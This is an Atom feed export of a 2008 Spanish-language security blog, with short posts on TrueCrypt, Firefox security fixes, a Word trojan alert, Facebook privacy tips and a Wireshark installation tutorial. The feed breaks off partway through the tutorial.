<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-777753328493010232</id><updated>2012-01-30T23:53:07.665-03:00</updated><category term='Documentales'/><category term='Documentos'/><category term='Herramientas'/><category term='Seguridad en la Web'/><category term='Noticias'/><category term='Criptografía'/><category term='Conceptos / Definiciones'/><title type='text'>Seguridad Segura</title><subtitle type='html'>&lt;code&gt;Security safe&lt;/code&gt;</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>78</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-8972590093161426672</id><published>2008-07-21T09:19:00.001-03:00</published><updated>2008-07-21T09:22:15.519-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Vulnerabilidad en Truecryp</title><content type='html'>El pasado viernes Bruce Schneier publicó un interesante análisis sobre diversas &lt;a href="http://www.schneier.com/blog/archives/2008/07/truecrypts_deni.html"&gt;vulnerabilidades encontradas&lt;/a&gt; en la versión 5.1a el software de cifrado &lt;a href="http://seguridadsegura.blogspot.com/2008/07/que-es-truecrypt.html"&gt;Truecrypt&lt;/a&gt;, cuyo uso está bastante extendido.&lt;br /&gt;&lt;br /&gt;En Security ArtWork &lt;a href="http://www.securityartwork.es/2008/07/21/vulnerabilidad-en-truecrypt/"&gt;analizamos los diversos escenarios de riesgo&lt;/a&gt; y proponemos soluciones, de diversos grados de paranoia, a estas vulnerabilidades.&lt;br /&gt;&lt;br /&gt;Fuente: &lt;a href="http://www.barrapunto.com"&gt;Barrapunto&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-8972590093161426672?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/8972590093161426672/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=8972590093161426672&amp;isPopup=true' title='5 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8972590093161426672'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/8972590093161426672'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/07/vulnerabilidad-en-truecryp.html' title='Vulnerabilidad en Truecryp'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>5</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-4458020143973827071</id><published>2008-07-17T16:39:00.001-03:00</published><updated>2008-07-17T16:41:21.079-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>La primera actualización de Firefox 3</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://accesstotools.com/wp-content/uploads/2008/03/firefox.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 111px; height: 108px;" src="http://accesstotools.com/wp-content/uploads/2008/03/firefox.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Firefox 3.0.1&lt;/span&gt; es la nueva actualización para solucionar los tres fallos críticos de seguridad según afirmo Mozilla.&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;El primero hace caer al navegador al tratar de abrir un GIF malformado en Mac OS X. &lt;/li&gt;&lt;li&gt;El segundo, descubierto por Billy Rios, afecta curiosamente a Firefox cuando no está funcionando. Si se pasa una URL con algún caracter "|" desde la línea de comandos se pueden ejecutar URIs de tipo "chrome", lo que permite explotar otras posibles vulnerabilidades. &lt;/li&gt;&lt;li&gt;El tercero permite sobrecargar el contador de objetos CSS y colgar el navegador, abriendo la puerta a una posible ejecución de código. Este fallo afecta también a Thunderbird y Seamonkey. &lt;/li&gt;&lt;/ul&gt;Paralelamente se ha publicado también Firefox 2.0.0.16, que corrige los dos últimos fallos pero en la serie 2...&lt;br /&gt;&lt;br /&gt;Fuente: &lt;a href="http://www.kriptopolis.org/"&gt;Kriptopolis&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-4458020143973827071?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/4458020143973827071/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=4458020143973827071&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4458020143973827071'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4458020143973827071'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/07/la-primera-actualizacin-de-firefox-3.html' title='La primera actualización de Firefox 3'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-1878049373228588769</id><published>2008-07-12T11:33:00.002-03:00</published><updated>2008-07-12T11:36:24.443-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>El nuevo iPhone ya fue Hackeado</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.gizmos.es/wp-content/uploads/2008/05/iphone-3g-en-espana.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 139px; height: 96px;" src="http://www.gizmos.es/wp-content/uploads/2008/05/iphone-3g-en-espana.jpg" alt="" border="0" /&gt;&lt;/a&gt;La verdad que este tipo de noticias ya no produce mucha impresión, la nueva versión del firmware del iPhone ya ha sido hackeada.&lt;br /&gt;&lt;br /&gt;El Jailbreak ha sido llevado a cabo por el &lt;span style="font-weight: bold;"&gt;iPhone Dev Team&lt;/span&gt;, como no, al que cada vez se le resisten menos las actualizaciones de Apple.&lt;br /&gt;&lt;br /&gt;Para aquellos seguidores de estos productos, podemos decir que aún no se encuentra disponible esta actualización, sin embargo ya fue anunciada para muy pronto.&lt;br /&gt;&lt;br /&gt;Fuente: &lt;a href="http://www.hispamp3.com/"&gt;HispaMP3&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-1878049373228588769?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/1878049373228588769/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=1878049373228588769&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1878049373228588769'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1878049373228588769'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/07/el-nuevo-iphone-ya-fue-hackeado.html' title='El nuevo iPhone ya fue Hackeado'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2161432236025846039</id><published>2008-07-09T21:31:00.001-03:00</published><updated>2008-07-09T21:33:57.471-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Symantec alerta de un nuevo agujero en Word</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://hispasystem.files.wordpress.com/2008/03/microsoft-word.png?w=202&amp;amp;h=201"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 128px; height: 128px;" src="http://hispasystem.files.wordpress.com/2008/03/microsoft-word.png?w=202&amp;amp;h=201" alt="" border="0" /&gt;&lt;/a&gt;Los crackers podrían haber encontrado una forma de atacar los PCs a través de una vulnerabilidad que &lt;span style="font-weight: bold;"&gt;Symantec&lt;/span&gt; cree haber detectado en el software de &lt;span style="font-weight: bold;"&gt;Microsoft Word&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Lo claro es que esta compañía de antivirus de inmediato se encuentra trabajando para reducir esas sospechas bajo varias versiones de Microsoft Word.&lt;br /&gt;&lt;br /&gt;En los últimos años, los crackers han encontrado múltiples formas de atacar a la suite ofimática de Microsoft, y este último ataque sigue el mismo patrón. Se trata de engañar a la víctima haciéndole abrir un documento Office que contiene código maligno, a través del cual se instala el software “intruso” en el PC.&lt;br /&gt;&lt;br /&gt;En este caso, el código maligno es un troyano llamado Backdoor.Darkmoon, que rastrea los movimientos de teclas de las víctimas para robar las contraseñas.&lt;br /&gt;&lt;br /&gt;Symantec dice que su software detecta el ataque, pero recomienda no abrir ningún documento Word sospechoso.&lt;br /&gt;&lt;br /&gt;Artículo completo: &lt;a href="http://www.theinquirer.es/"&gt;The Inquirer ES&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2161432236025846039?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2161432236025846039/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2161432236025846039&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2161432236025846039'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2161432236025846039'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/07/symantec-alerta-de-un-nuevo-agujero-en.html' title='Symantec alerta de un nuevo agujero en Word'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-4278822382873901132</id><published>2008-07-08T12:59:00.002-03:00</published><updated>2008-07-08T13:01:52.346-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Que es TrueCrypt</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://phobos.xtec.net/fmas/imatges/usb_truecrypt.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 120px;" src="http://phobos.xtec.net/fmas/imatges/usb_truecrypt.png" alt="" border="0" /&gt;&lt;/a&gt;&lt;a href="http://www.truecrypt.org/"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;TrueCrypt&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; es una aplicación libre que permite crear volúmenes de cifrado, de tal forma que todo lo que contenga este disco virtual, partición de disco o unidad de almacenamiento USB solo pueda ser accedido si conoce la contraseña y/o archivo clave que se utilizó al momento que fue creado.&lt;br /&gt;&lt;br /&gt;Una particularidad muy interesantes es que el cifrado y el descifrado se realiza en memoria RAM, de forma totalmente transparente al usuario antes de ser almacenado o escrito en el disco.&lt;br /&gt;&lt;br /&gt;Esta aplicación es multiplataforma por tal motivo podemos realizar encriptaciones en &lt;span style="font-weight: bold;"&gt;Windows&lt;/span&gt; y desencriptarlo en &lt;span style="font-weight: bold;"&gt;GNU/Linux&lt;/span&gt; o viceversa.&lt;br /&gt;&lt;br /&gt;Para más información podes ingresar el sitio oficial del proyecto &lt;a href="http://www.truecrypt.org/"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;TrueCrypt&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-4278822382873901132?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/4278822382873901132/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=4278822382873901132&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4278822382873901132'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4278822382873901132'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/07/que-es-truecrypt.html' title='Que es TrueCrypt'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-7145102028003654552</id><published>2008-07-07T10:48:00.001-03:00</published><updated>2008-07-07T10:51:18.893-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Simulador para Hacker</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.juegosgratis.name/data/images/chorradas/Hacker.lE8f.gif"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 99px; height: 66px;" src="http://www.juegosgratis.name/data/images/chorradas/Hacker.lE8f.gif" alt="" border="0" /&gt;&lt;/a&gt;Hoy se dió a conocer un juego que a muchos puede llegar a gustarle. En &lt;a href="http://arcade.networktechs.com/full.php?id=3507"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Hacker Simulator&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; y &lt;a href="http://www.hackerevolution.org/"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Hacker Evolution&lt;/span&gt;&lt;/span&gt;&lt;/a&gt; pueden ponerse a prueba con sus conocimientos de hacking. El juego no presenta grandes dificultades y tenemos la posibilidad de contar con ayuda en el boton “&lt;span style="font-style: italic;"&gt;Hint&lt;/span&gt;”.&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Comenzá a demostrar todos tus conocimiento de Hacker con la ayuda de este simulador.&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-7145102028003654552?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/7145102028003654552/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=7145102028003654552&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7145102028003654552'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7145102028003654552'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/07/simulador-para-hacker.html' title='Simulador para Hacker'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-518020774902241583</id><published>2008-07-03T10:41:00.002-03:00</published><updated>2008-07-03T10:43:38.260-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Documentos'/><title type='text'>Tips de Seguridad para Facebook</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://ramirobm.files.wordpress.com/2007/10/facebook.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://ramirobm.files.wordpress.com/2007/10/facebook.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Lamentablemente por falta de tiempo, abandonamos un poco el blog de Seguridad Segura, les prometo que a partir de ahora vamos a comenzar a actualizarlo y a ser más constante. Gracias por seguir hay acompañandonos.&lt;br /&gt;&lt;br /&gt;En estos días encontré en varios sitios de seguridad un documento que nos muestra un poco de seguridad para tener en cuenta en la red social mas grande del mundo, por supuesto que hablamos de &lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Facebook&lt;/span&gt;&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;La incorporación de imágenes, videos y sonidos y la combinación de estas redes con servicios como Youtube.com, hacen que los perfiles o fichas personales de cada usuario sean verdaderos resúmenes de información, diarios íntimos y álbumes de fotos personales, soñadas solo por madres y abuelas de todo el mundo. Estas páginas web almacenan datos que sirven para obtener desde el perfil psicológico, hasta datos personales como fechas de nacimiento, que pueden ser utilizados por Ciberdelincuentes en la suplantación de identidades en Internet para obtener acceso a cuentas bancarias en línea y para el uso de servicios web. Sirven también estos datos para dar todo tipo información a hampones y organizaciones criminales del mundo real y físico.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a href="http://rapidshare.com/files/126799747/TipsdeSeguridadparaFacebook.pdf"&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Descarga desde AQUI los Tips de Seguridad para Facebook&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-518020774902241583?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/518020774902241583/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=518020774902241583&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/518020774902241583'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/518020774902241583'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/07/tips-de-seguridad-para-facebook.html' title='Tips de Seguridad para Facebook'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-6130452332052473432</id><published>2008-03-10T23:31:00.001-02:00</published><updated>2008-03-10T23:33:34.250-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Documentales'/><title type='text'>En busca de Hackers, documental</title><content type='html'>Este es un documental, pretende cambiar nuestras ideas preconcebidas de lo que es un hacker e introducirnos en la nueva era de la tecnología.&lt;br /&gt;&lt;br /&gt;&lt;object height="350" width="425"&gt;&lt;param name="movie" value="http://tu.tv/tutvweb.swf?kpt=aHR0cDovL3R1LnR2L3ZpZGVvc2NvZGkvZS9uL2VuLWJ1c2NhLWRlLWhhY2tlcnMtZG9jdW1lbnRh bC1vZGlzZWEuZmx2&amp;amp;xtp=112418"&gt;&lt;param name="wmode" value="transparent"&gt;&lt;embed src="http://tu.tv/tutvweb.swf?kpt=aHR0cDovL3R1LnR2L3ZpZGVvc2NvZGkvZS9uL2VuLWJ1c2NhLWRlLWhhY2tlcnMtZG9jdW1lbnRh%20bC1vZGlzZWEuZmx2&amp;amp;xtp=112418" type="application/x-shockwave-flash" wmode="transparent" height="350" width="425"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;a href="http://www.tu.tv/"&gt;&lt;img src="http://www.tu.tv/img/tranparente.gif" alt="www.Tu.tv" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;preconcebidas de lo que es un &lt;a href="http://foro.dragonjar.us/hacking_etico-b18.0/"&gt;hacker&lt;/a&gt; e introducirnos en la nueva era de la tecnología.&lt;br /&gt;&lt;br /&gt;Artículo completo &lt;a href="http://www.dragonjar.org/en-busca-de-hackers-documental.xhtml"&gt;dragonjar&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-6130452332052473432?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/6130452332052473432/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=6130452332052473432&amp;isPopup=true' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6130452332052473432'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/6130452332052473432'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2008/03/en-busca-de-hackers-documental.html' title='En busca de Hackers, documental'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-8309938445693304583</id><published>2008-03-10T22:40:00.011-02:00</published><updated>2008-12-10T12:33:54.628-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Herramientas'/><title type='text'>Instalando y Ejecutando Wireshark</title><content type='html'>En esta oportunidad vamos a ver como poner en funcionamiento Wireshark.&lt;br /&gt;Primero para instalarlo vamos a Konsola, Yakuake o lo que usen, y coloquen &lt;blockquote&gt;$ sudo apt-get install wireshark&lt;/blockquote&gt;Una vez instalado lo ejecutamos como root&lt;br /&gt;&lt;blockquote&gt;$ sudo wireshark&lt;/blockquote&gt;Y nos abre la siguiente ventana&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nams9blykQY/R9XZDGXLKrI/AAAAAAAAADA/PQYHTivm4pI/s1600-h/ventanainicio.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://3.bp.blogspot.com/_nams9blykQY/R9XZDGXLKrI/AAAAAAAAADA/PQYHTivm4pI/s320/ventanainicio.jpg" alt="" id="BLOGGER_PHOTO_ID_5176281994002901682" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nams9blykQY/R9XaYWXLKtI/AAAAAAAAADQ/TvzSyKHXmWg/s1600-h/placasdered.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_nams9blykQY/R9XaYWXLKtI/AAAAAAAAADQ/TvzSyKHXmWg/s200/placasdered.jpg" alt="" id="BLOGGER_PHOTO_ID_5176283458586749650" border="0" /&gt;&lt;/a&gt;  Con el primer boton nos muestra las diferentes placas de red disponibles en esta pantalla&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_nams9blykQY/R9XcbWXLKwI/AAAAAAAAADo/AsvA35ucj6k/s1600-h/ventanaplacas.jpg"&gt;&lt;img style="cursor: pointer;" src="http://4.bp.blogspot.com/_nams9blykQY/R9XcbWXLKwI/AAAAAAAAADo/AsvA35ucj6k/s320/ventanaplacas.jpg" alt="" id="BLOGGER_PHOTO_ID_5176285709149612802" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Podemos cliquear sobre el boton start de la placa de red que quisieramos chequear y comienza a mostrarnos en tiempo real los paquetes que envia y recibe la computadora por medio de la placa seleccionada&lt;br /&gt;La siguiente imagen muestra mas o menos lo que se ve en el momento de la captura&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_nams9blykQY/R9Xd42XLKxI/AAAAAAAAADw/ZhzCcwX7srM/s1600-h/ventanaejecucion.jpg"&gt;&lt;img style="cursor: pointer;" src="http://2.bp.blogspot.com/_nams9blykQY/R9Xd42XLKxI/AAAAAAAAADw/ZhzCcwX7srM/s320/ventanaejecucion.jpg" alt="" id="BLOGGER_PHOTO_ID_5176287315467381522" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;La ventana se divide en 3 filas que nos muestran los paquetes enviado y recibidos, y también información de los mismo.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_nams9blykQY/R9XhZGXLKyI/AAAAAAAAAD4/6DPwBg8CfXE/s1600-h/opciones.jpg"&gt;&lt;img style="cursor: pointer;" src="http://3.bp.blogspot.com/_nams9blykQY/R9XhZGXLKyI/AAAAAAAAAD4/6DPwBg8CfXE/s320/opciones.jpg" alt="" id="BLOGGER_PHOTO_ID_5176291168053046050" border="0" /&gt;&lt;/a&gt;Con el segundo boton accedemos a las propiedades de la captura que queremos hacer&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 